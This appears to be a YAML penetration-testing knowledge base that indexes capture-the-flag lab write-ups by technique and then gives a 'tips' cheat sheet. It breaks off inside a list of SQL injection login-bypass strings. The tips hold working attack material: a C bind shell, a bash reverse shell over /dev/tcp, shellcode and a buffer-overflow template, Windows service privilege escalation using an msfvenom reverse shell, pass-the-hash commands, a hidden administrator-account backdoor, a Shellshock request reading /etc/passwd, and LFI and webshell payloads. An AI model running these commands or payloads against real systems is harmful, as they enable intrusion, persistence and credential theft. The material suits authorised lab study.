          points: 20
          status: public
          tags:
          - exploit_sqli
          - exploit_credsreuse
          - privesc_shell_escape
          - privesc_mysql_root
          - privesc_mysql_udf
          url: https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
          verbose_id: vh#25
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf
      privesc_ssh_authorizedkeys:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20190920
          infra: VulnHub
          name: 'HackLAB: Vulnix'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_nfs_norootsquash
          - privesc_ssh_authorizedkeys
          url: https://www.vulnhub.com/entry/hacklab-vulnix,48/
          verbose_id: vh#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
      privesc_ssh_knownhosts:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191017
          infra: VulnHub
          name: 'Moria: 1.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - privesc_ssh_knownhosts
          url: https://www.vulnhub.com/entry/moria-11,187/
          verbose_id: vh#187
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.moria11/writeup.pdf
      privesc_strace_setuid:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191010
          infra: VulnHub
          name: 'Lin.Security: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_nfs_rw
          - exploit_ssh_authorizedkeys
          - privesc_strace_setuid
          - privesc_docker_group
          url: https://www.vulnhub.com/entry/linsecurity-1,244/
          verbose_id: vh#244
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf
      privesc_sudo:
        cli: ''
        description: using `sudo` to execute programs that run with elevated privileges
        references: []
        writeups:
        - datetime: 20200625
          infra: HackTheBox
          name: Bashed
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_http
          - exploit_python_reverseshell
          - privesc_sudo
          - privesc_cron_rootjobs
          url: https://app.hackthebox.eu/machines/118
          verbose_id: htb#118
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf
        - datetime: 20190831
          infra: VulnHub
          name: 'Brainpan: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - exploit_bof
          - privesc_anansi
          - privesc_sudo
          url: https://www.vulnhub.com/entry/brainpan-1,51/
          verbose_id: vh#51
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf
        - datetime: 20190910
          infra: VulnHub
          name: 'DC: 6'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_activitymonitor
          - privesc_mysql_creds
          - privesc_sudo
          - privesc_nmap
          url: https://www.vulnhub.com/entry/dc-6,315/
          verbose_id: vh#315
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
        - datetime: 20190911
          infra: VulnHub
          name: 'FristiLeaks: 1.3'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png"
            width="100" height="100" />
          points: 30
          status: public
          tags:
          - exploit_php_fileupload
          - exploit_php_fileupload_bypass
          - privesc_sudo
          - privesc_setuid
          url: https://www.vulnhub.com/entry/fristileaks-13,133/
          verbose_id: vh#133
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf
        - datetime: 20190929
          infra: VulnHub
          name: 'Kioptrix: Level 1.2 (#3)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_lotuscms
          - privesc_sudoers
          - privesc_sudo
          url: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
          verbose_id: vh#24
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf
        - datetime: 20191029
          infra: VulnHub
          name: 'LazySysAdmin: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_smb_nullsession
          - exploit_smb_web_root
          - exploit_php_reverseshell
          - exploit_credsreuse
          - exploit_wordpress_template
          - privesc_sudo
          url: https://www.vulnhub.com/entry/lazysysadmin-1,205/
          verbose_id: vh#205
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
      privesc_sudoers:
        cli: ''
        description: being able to edit the `/etc/sudoers` file to give a user elevated
          privileges
        references: []
        writeups:
        - datetime: 20191113
          infra: HackTheBox
          name: Blocky
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_app_wordpress
          - exploit_wordpress_plugin
          - exploit_credsreuse
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/48
          verbose_id: htb#48
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf
        - datetime: 20191112
          infra: HackTheBox
          name: Mirai
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_defaultcreds
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/64
          verbose_id: htb#64
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf
        - datetime: 20191113
          infra: HackTheBox
          name: Shocker
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_shellshock
          - privesc_sudoers
          url: https://app.hackthebox.eu/machines/108
          verbose_id: htb#108
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf
        - datetime: 20190905
          infra: VulnHub
          name: 'Billy Madison: 1.1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png"
            width="100" height="100" />
          points: 40
          status: public
          tags:
          - privesc_setuid
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/billy-madison-11,161/
          verbose_id: vh#161
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf
        - datetime: 20190909
          infra: VulnHub
          name: 'BSides Vancouver: 2018 (Workshop)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - enumerate_proto_ftp
          - enumerate_proto_ssh
          - exploit_ssh_bruteforce
          - enumerate_proto_http
          - enumerate_app_wordpress
          - exploit_wordpress_plugin_hellodolly
          - exploit_php_reverseshell
          - privesc_cron
          - privesc_sudoers
          url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
          verbose_id: vh#231
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        - datetime: 20190929
          infra: VulnHub
          name: 'Kioptrix: Level 1.2 (#3)'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_lotuscms
          - privesc_sudoers
          - privesc_sudo
          url: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
          verbose_id: vh#24
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf
        - datetime: 20191011
          infra: VulnHub
          name: 'Misdirection: 1'
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_php_webshell
          - exploit_bash_reverseshell
          - privesc_sudoers
          - privesc_passwd_writable
          url: https://www.vulnhub.com/entry/misdirection-1,371/
          verbose_id: vh#371
          writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf
      privesc_tmux_rootsession:
        cli: ''
        description: null
        references:
        - null
      privesc_windows_ms10_059:
        cli: 'wget https://github.com/abatchy17/WindowsExploits/raw/master/MS10-059%20-%20Chimichurri/MS10-059.exe

          sharehttp <targetport>

          certutil.exe -urlcache -split -f "http://<attackerip>:<targetport>/MS10-059.exe"
          pe.exe

          nc -nlvp 444

          pe.exe <attackerip> 444

          '
        description: null
        references:
        - https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560
        - https://github.com/abatchy17/WindowsExploits/tree/master/MS10-059%20-%20Chimichurri
      privesc_windows_ms11_046:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191105
          infra: HackTheBox
          name: Devel
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_ftp_anonymous
          - exploit_ftp_web_root
          - exploit_iis_asp_reverseshell
          - privesc_windows_ms11_046
          url: https://app.hackthebox.eu/machines/3
          verbose_id: htb#3
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
      privesc_windows_ms14_070:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191104
          infra: HackTheBox
          name: Grandpa
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_iis_webdav
          - privesc_windows_ms14_070
          url: https://app.hackthebox.eu/machines/13
          verbose_id: htb#13
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf
      privesc_windows_ms15_051:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191104
          infra: HackTheBox
          name: Granny
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_iis_webdav
          - privesc_windows_ms15_051
          url: https://app.hackthebox.eu/machines/14
          verbose_id: htb#14
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf
      privesc_windows_ms16_032:
        cli: ''
        description: null
        references:
        - null
      privesc_windows_ms16_098:
        cli: ''
        description: null
        references: []
        writeups:
        - datetime: 20191104
          infra: HackTheBox
          name: Optimum
          overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png"
            width="100" height="100" />
          points: 20
          status: public
          tags:
          - exploit_hfs_cmd_exec
          - privesc_windows_ms16_098
          url: https://app.hackthebox.eu/machines/6
          verbose_id: htb#6
          writeup: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf
      privesc_windows_upnphost:
        cli: 'msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport>
          EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -a x86 --platform
          windows -f exe -o pe.exe

          # upload pe.exe file to the target system

          sudo nc -nlvp <attackerport>


          sc config upnphost binpath= "C:\Inetpub\wwwroot\pe.exe"

          sc qc upnphost

          sc config upnphost obj= ".\LocalSystem" password= ""

          sc config SSDPSRV start= auto

          net start SSDPSRV

          net start upnphost

          '
        description: On a Windows XP system, we can modify the insecurely configured
          `upnphost` service to gain elevated privileges. This can be done by creating
          a reverse shell binary and getting it executed by restarting the vulnerable
          service.
        references:
        - https://www.hackingdream.net/2020/03/windows-privilege-escalation-cheatsheet-for-oscp.html
  tips:
  - cli: "bs.c\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <stdlib.h>\n\
      #include <unistd.h>\nint main(int argc, char* argv[]) {\n  int host_sock = socket(AF_INET,\
      \ SOCK_STREAM, 0);\n  struct sockaddr_in host_addr;\n  host_addr.sin_family\
      \ = AF_INET;\n  host_addr.sin_port = htons(atoi(argv[1]));\n  host_addr.sin_addr.s_addr\
      \ = INADDR_ANY;\n  bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));\n\
      \  listen(host_sock, 0);\n  int client_sock = accept(host_sock, NULL, NULL);\n\
      \  dup2(client_sock, 0);\n  dup2(client_sock, 1);\n  dup2(client_sock, 2);\n\
      \  execve(\"/bin/bash\", NULL, NULL);\n}\ngcc -m32 -o bs bs.c\n./bs 4444\n"
    description: bind shell
  - category:
    - ttp
    cli: "payload = \"\\x41\" * <length> + <ret_address> + \"\\x90\" * 16 + <shellcode>\
      \ + \"\\x43\" * <remaining_length>\npattern create: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb\
      \ -l <attackerport>\npattern offset: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb\
      \ -l <attackerport> -q <address>\nnasm: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb\n\
      nasm > jmp eax\nbad characters:\nbadchars = (\n\"\\x01\\x02\\x03\\x04\\x05\\\
      x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\"\n\"\\x11\\x12\\x13\\\
      x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\"\n\"\\x21\\\
      x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\"\n\
      \"\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\\
      x40\"\n\"\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\\
      x4e\\x4f\\x50\"\n\"\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\\
      x5c\\x5d\\x5e\\x5f\\x60\"\n\"\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\\
      x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\"\n\"\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\\
      x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\"\n\"\\x81\\x82\\x83\\x84\\x85\\\
      x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\"\n\"\\x91\\x92\\x93\\\
      x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\"\n\"\\xa1\\\
      xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\"\n\
      \"\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\\
      xc0\"\n\"\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\\
      xce\\xcf\\xd0\"\n\"\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\\
      xdc\\xdd\\xde\\xdf\\xe0\"\n\"\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\\
      xea\\xeb\\xec\\xed\\xee\\xef\\xf0\"\n\"\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\\
      xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff\")\nfind address for \"jmp esp\" using\
      \ mona.py:\n!mona jmp -r esp -b <list of bad chars>\ngcc compilation options:\n\
      linux: gcc -m32 -Wl,--hash-style=both 9542.c -o 9542\n  -wl,--hash-style=both:\
      \ linker option to enable both gnu and sysv style hashtable support\nreferences:\n\
      https://github.com/s0wr0b1ndef/OSCP-note/blob/master/Buffer_overflow/info.txt\n\
      https://github.com/justinsteven/dostackbufferoverflowgood/blob/master/dostackbufferoverflowgood_tutorial.md\n"
    description: buffer overflow
  - cli: "certutil.exe -urlcache -split -f \"https://download.sysinternals.com/files/PSTools.zip\"\
      \ pstools.zip\npowershell -c \"(new-object System.Net.WebClient).DownloadFile('http://<targetip>/file.exe','C:\\\
      Users\\user\\Desktop\\file.exe')\"\npython3 -m pyftpdlib -p 21\nrdesktop <targetip>\
      \ -r disk:remotedisk=/usr/share/windows-binaries\n\ngzip+xxd:\n  sender:\n \
      \   gzip -c < file > file.gz\n    xxd -p file.gz | tr -d '\\n' && echo\n  receiver:\n\
      \    echo 1f8b...0000 > /tmp/file.gz.hex\n    xxd -p -r < /tmp/file.gz.hex >\
      \ /tmp/file.gz\n    gunzip -c < /tmp/file.gz > /tmp/file\n\nautomate file download\
      \ via windows ftp client:\n  echo open <targetip> >ftp_commands.txt\n  echo\
      \ anonymous >>ftp_commands.txt\n  echo whatever >>ftp_commands.txt\n  echo binary\
      \ >>ftp_commands.txt\n  echo get met8888.exe >>ftp_commands.txt\n  echo bye\
      \ >>ftp_commands.txt\n  ftp -s:ftp_commands.txt\n\ncreate wget.vbs and download\
      \ netcat:\n  >C:\\Windows\\d.vbs\n  echo strUrl = WScript.Arguments.Item(0)\
      \  >>C:\\Windows\\d.vbs\n  echo StrFile = WScript.Arguments.Item(1)  >>C:\\\
      Windows\\d.vbs\n  echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0  >>C:\\Windows\\\
      d.vbs\n  echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0  >>C:\\Windows\\\
      d.vbs\n  echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1  >>C:\\Windows\\d.vbs\n\
      \  echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2  >>C:\\Windows\\d.vbs\n  echo\
      \ Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts  >>C:\\Windows\\\
      d.vbs\n  echo Err.Clear  >>C:\\Windows\\d.vbs\n  echo Set http = Nothing  >>C:\\\
      Windows\\d.vbs\n  echo Set http = CreateObject(\"WinHttp.WinHttpRequest.5.1\"\
      )  >>C:\\Windows\\d.vbs\n  echo If http Is Nothing Then Set http = CreateObject(\"\
      WinHttp.WinHttpRequest\")   >>C:\\Windows\\d.vbs\n  echo If http Is Nothing\
      \ Then Set http = CreateObject(\"MSXML2.ServerXMLHTTP\")   >>C:\\Windows\\d.vbs\n\
      \  echo If http Is Nothing Then Set http = CreateObject(\"Microsoft.XMLHTTP\"\
      )  >>C:\\Windows\\d.vbs\n  echo http.Open \"GET\", strURL, False  >>C:\\Windows\\\
      d.vbs\n  echo http.Send  >>C:\\Windows\\d.vbs\n  echo varByteArray = http.ResponseBody\
      \  >>C:\\Windows\\d.vbs\n  echo Set http = Nothing  >>C:\\Windows\\d.vbs\n \
      \ echo Set fs = CreateObject(\"Scripting.FileSystemObject\")  >>C:\\Windows\\\
      d.vbs\n  echo Set ts = fs.CreateTextFile(StrFile, True)  >>C:\\Windows\\d.vbs\n\
      \  echo strData = \"\"  >>C:\\Windows\\d.vbs\n  echo strBuffer = \"\"  >>C:\\\
      Windows\\d.vbs\n  echo For lngCounter = 0 to UBound(varByteArray)  >>C:\\Windows\\\
      d.vbs\n  echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))\
      \  >>C:\\Windows\\d.vbs\n  echo Next  >>C:\\Windows\\d.vbs\n  echo ts.Close\
      \ >>C:\\Windows\\d.vbs\n  dir C:\\Windows\\d.vbs\n  C:\\Windows\\d.vbs \"http://<targetip>/nc.exe\"\
      \ C:\\Windows\\nc.exe\n\nnetcat:\n  nc -w3 <targetip> 1234 <file.sent\n  cmd\
      \ /c nc.exe -l -v -p 1234 >file.rcvd\n\nsmb (139/tcp, 445/tcp):\n  server: python\
      \ smbserver.py -smb2support shared $HOME/toolbox/scripts/shared\n    copy ntlm/lm\
      \ hashes submitted by windows clients during transfers and crack via jtr/hashcat\n\
      \  client:\n    list files: smbclient -L <targetip> --no-pass\n    list files:\
      \ net view \\\\<targetip>\n    list files: dir \\\\<targetip>\\shared\n    copy\
      \ files: copy \\\\<targetip>\\shared\\met8888.exe\n    execute files: \\\\<targetip>\\\
      shared\\met8888.exe\n\ntftp (69/udp):\n  server:\n    atftpd --daemon --port\
      \ 69 $HOME/toolbox/scripts/shared\n    metasploit:\n      use auxiliary/server/tftp\n\
      \      set TFTPROOT $HOME/toolbox/scripts/shared\n      exploit\n  client:\n\
      \    download: tftp -i <targetip> GET met8888.exe\n    upload: tftp -i <targetip>\
      \ PUT hashes.txt\n    install: pkgmgr /iu:\"TFTP\"\n"
    description: file transfers
  - cli: 'nmap --script=ssl-heartbleed -p <targetport> <targetip>

      https://github.com/sensepost/heartbleed-poc

      python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin
      <targetip> -p <targetport>

      strings dump.bin

      '
    description: heartbleed
  - cli: 'config file: /etc/iptables/rules.v4

      '
    description: iptables
  - cli: "scan:\n  uniscan -u http://<targetip>/ -qweds\n  wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt\
      \ --hc 404 http://<targetip>/FUZZ\nphp b64 leak and command execution:\n  php://filter/convert.base64-encode/resource=<pagename>\n\
      \  <?php echo passthru($_GET[cmd]) ?>\nbypass upload filter:\n  change extension\
      \ to PHP, PHP3, PHP4, PHP5\n  add magic bytes to start of file (eg: GIF87 to\
      \ a php shell) to evade upload filters\nlocal file access: http://<targetip>/?page=php://filter/convert.base64-encode/resource=index\n\
      notice urls that accept a generic filename as parameter:\n  ?page=file1.php\n\
      \  ?page=../../../../../../etc/passwd\n  ?page=../../../../../../windows/system32/drivers/etc/hosts\n\
      ippsec steps (htb.beep: https://youtu.be/XJmBpOd__N8):\n  /etc/passwd\n  /proc/self/status\n\
      find home username in passwd, locate home directory for user:\n  /var/lib/asterisk/.ssh/id_rsa\n"
    description: lfi/rfi/image upload
    references:
    - http://<targetip>/index.php?file=php://filter/convert.base64-encode/resource=index.php
    - http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html
    - https://gist.github.com/AvasDream/47f13a510e543009a50c8241276afc24
    - https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI
    - https://snowscan.io/htb-writeup-friendzone/
    - https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
  - cli: "pth-toolkit:\n  git clone https://github.com/byt3bl33d3r/pth-toolkit\n \
      \ pth-winexe -U hash //IP cmd\nxfreerdp:\n  apt-get install freerdp-x11\n  xfreerdp\
      \ /u:offsec /d:win2012 /pth:HASH /v:IP\nmeterpreter:\n  meterpreter > run post/windows/gather/hashdump\n\
      \  Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::\n\
      \  msf > use exploit/windows/smb/psexec\n  msf exploit(psexec) > set payload\
      \ windows/meterpreter/reverse_tcp\n  msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c\n\
      \  msf exploit(psexec) > exploit\n  meterpreter > shell\nmisc:\n  fgdump.exe\n\
      \  /usr/bin/pth-winexe -U administrator%0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52\
      \ //<targetip> cmd.exe\n  wmiexec.exe -hashes 0182BD0BD4444BF836077A718CCDF409:259745CB123A52AA2E693AAACCA2DB52\
      \ administrator@localhost\n"
    description: passthehash
  - cli: 'shadow file structure: $id$salt$password

      generate shadow file hash:

      mkpasswd -m md5 password salt

      mkpasswd -m sha-256 password salt

      mkpasswd -m sha-512 password salt

      '
    description: passwords
  - cli: "add a new administrator user:\n  net user anderson cooper /add && net localgroup\
      \ administrators anderson /add\nadd user to rdp group:\n  net localgroup \"\
      Remote Desktop Users\" anderson /add\nenable rdp in firewall:\n  reg add \"\
      hklm\\system\\currentcontrolset\\control\\terminal server\" /f /v fDenyTSConnections\
      \ /t REG_DWORD /d 0\n  netsh firewall set service remoteadmin enable\n  netsh\
      \ firewall set service remotedesktop enable\n  netsh firewall add portopening\
      \ TCP <targetport> \"RDP\"\nenable rdp via registry (requries reboot):\n  reg\
      \ add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\"\
      \ /v fDenyTSConnections /t REG_DWORD /d 0 /f\nis rdp service running:\n  tasklist\
      \ /svc | findstr /c:TermService\nstart rdp service:\n  net start TermService\n\
      permanently enable rdp service:\n  sc config TermService start=auto\ncode:\n\
      \  useradd.c:\n    #include <stdlib.h>\n    int main() {\n      int i;\n   \
      \   i=system(\"net user anderson cooper /add && net localgroup administrators\
      \ anderson /add\");\n      return 0;\n    }\n  add user:\n    #include <stdlib.h>\
      \ /* system, NULL, EXIT_FAILURE */\n    int main() {\n      int i;\n      i=system(\"\
      net user anderson cooper /add && net localgroup administrators anderson /add\"\
      );\n      return 0;\n    }\n    # compile: i686-w64-mingw32-gcc -o useradd.exe\
      \ useradd.c\n"
    description: persistence
    references:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md
  - cli: "socat:\n  socat tcp-listen:<targetport>,fork,reuseaddr tcp:127.0.0.1:80\
      \ &\n  socat tcp-listen:8065,fork,reuseaddr tcp:127.0.0.1:65334 &\nplink:\n\
      \  plink.exe -v -x -a -T -C -noagent -ssh -pw \"<localpassword>\" -R <targetport>:127.0.0.1:<targetport>\
      \ <localuser>@<attackerip>\nmeterpreter:\n  # https://www.offensive-security.com/metasploit-unleashed/portfwd/\n\
      \  # forward remote port to local address\n  meterpreter > portfwd add --l <targetport>\
      \ --p <targetport> --r <targetip>\n  kali > rdesktop 127.0.0.1:<targetport>\n"
    description: port forward
  - cli: 'knock once on port <targetport>/tcp:

      hping3 <targetip> -S -p <targetport> -c 1

      nc -vvvz <targetip> <targetport>

      knock on multiple tcp ports in a given sequence:

      hping3 <targetip> -S -p 666 -c 1; hping3 <targetip> -S -p 7000 -c 1; hping3
      <targetip> -S -p 8890 -c 1

      nmap -Pn -sT -r -p666,7000,8890 <targetip>

      '
    description: portknock
    references:
    - https://blog.knapsy.com/blog/2014/10/16/knock-knock-vm-walkthrough/
    - https://highon.coffee/blog/fartknocker-walkthrough/
  - cli: "rbash:\n  bash -i\n  BASH_CMDS[foobar]=/bin/bash;foobar\nlshell:\n  echo\
      \ os.system(\"/bin/bash\")\n"
    description: restricted shells
  - cli: "reverse tcp shell from bash:\n  /bin/bash -i >& /dev/tcp/<targetip>/<attackerport>\
      \ 0>&1\nmake a partially interactive terminal usable:\n  target: python -c \"\
      import pty; pty.spawn('/bin/bash')\"\nlocal:\n  stty raw -echo ; fg\ntarget:\n\
      \  reset ; export SHELL=bash ; export TERM=xterm ; stty size ; stty -rows 45\
      \ -columns 90 ; stty size\nreverse php shell on windows:\n  https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse%20Shell.php\n"
    description: reverse shell
    references:
    - https://shellgenerator.github.io/
    - http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
  - cli: '/bin/sh: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

      '
    description: shellcode
  - cli: 'look for /cgi-bin/ directory (incldue 403 code for gobuster scan)

      check for scripts (-x sh,pl) using gobuster

      test http header, user-agent probably

      curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c ''cat /etc/passwd''"
      http://<targetip>/cgi-bin/user.sh

      gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
      -s 200,204,301,302,307,403

      gobuster -u <targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
      -s 200,204,301,302,307,403 -k -x sh,pl,py

      nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls
      <targetip>

      '
    description: shellshock
  - cli: "manual verification:\n  ' or 1=1 -- -\n  ' || 1=1 #\n  or 1=1\n  or 1=1--\n\
      \  or 1=1#\n  or 1=1/*\n  admin' --\n  admin' #\n  admin'/*\n  admin' or '1'='1\n\
      \  admin' or '1'='1'--\n  admin' or '1'='1'#\n  admin' or '1'='1'/*\n  admin'or\
      \ 1=1 or ''='\n  admin' or 1=1\n  admin' or 1=1--\n  admin' or 1=1#\n  admin'\
      \ or 1=1/*\n  admin') or ('1'='1\n  admin') or ('1'='1'--\n  admin') or ('1'='1'#\n\
      \  admin') or ('1'='1'/*\n  admin') or '1'='1\n  admin') or '1'='1'--\n  admin')\
